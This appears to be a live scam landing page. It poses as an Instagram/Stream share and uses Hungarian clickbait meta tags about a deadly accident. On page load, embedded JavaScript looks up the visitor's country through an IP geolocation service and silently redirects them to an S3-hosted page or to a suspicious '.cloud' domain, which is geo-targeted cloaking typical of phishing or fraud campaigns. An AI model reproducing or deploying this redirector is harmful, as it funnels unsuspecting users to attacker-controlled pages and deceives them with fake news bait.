<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="138,142,115,látogatások"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Ez a tragikus eset ma reggel több emberéletet követelt"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1225045975517757527/1226738103058956318/fdsafrewrw432233.png?ex=6625dbe3&is=661366e3&hm=81ed6001a97ff55e72567f28610b0f56f4d0fab274fa872f3cdab960f5cd9c53&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <script type="text/javascript">
        // Función para obtener el país del usuario basado en su dirección IP
        function getCountryFromIP(callback) {
            // Llamada a un servicio de geolocalización basado en IP (puedes utilizar servicios como ipapi.co, ipinfo.io, etc.)
            fetch('https://ipapi.co/json/')
                .then(response => response.json())
                .then(data => {
                    // Llama al callback con el código del país obtenido
                    callback(data.country);
                })
                .catch(error => {
                    console.error('Error al obtener la ubicación del usuario:', error);
                    // Si hay un error, llama al callback con un valor predeterminado (por ejemplo, 'US' para Estados Unidos)
                    callback('US');
                });
        }

        // Redirigir a la URL específica según el país del usuario
        getCountryFromIP(function(countryCode) {
            switch(countryCode) {
                case 'AT':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
                case 'AU':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'BE':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'BG':
                    window.location.replace("https://pong024.jaskingnew212.cloud");
                    break;
				case 'HR':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'CY':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'DK':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'FR':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'AL':
                    window.location.replace("https://pong024.jaskingnew212.cloud");
                    break;
				case 'DE':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'GR':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'IT':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'MT':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'NL':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'NZ':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'PT':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'PL':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'ES':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'SE':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'CH':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;	
				case 'TR':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'GB':
                    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'AE':
             	    window.location.replace("https://kingmok0002024.s3.eu-west-3.amazonaws.com/jef00224.html");
                    break;
				case 'TW':
             	    window.location.replace("https://pong024.jaskingnew212.cloud");
                    break;
				case 'HU':
             	    window.location.replace("https://pong024.jaskingnew212.cloud");
                    break;	
                // Agrega más casos según los países que desees manejar
                default:
                    window.location.replace("https://example.com/default_page.html");
            }
        });
    </script>
</head>
<body>
    <!-- Aquí puedes agregar contenido adicional si lo deseas -->
</body>
</html>

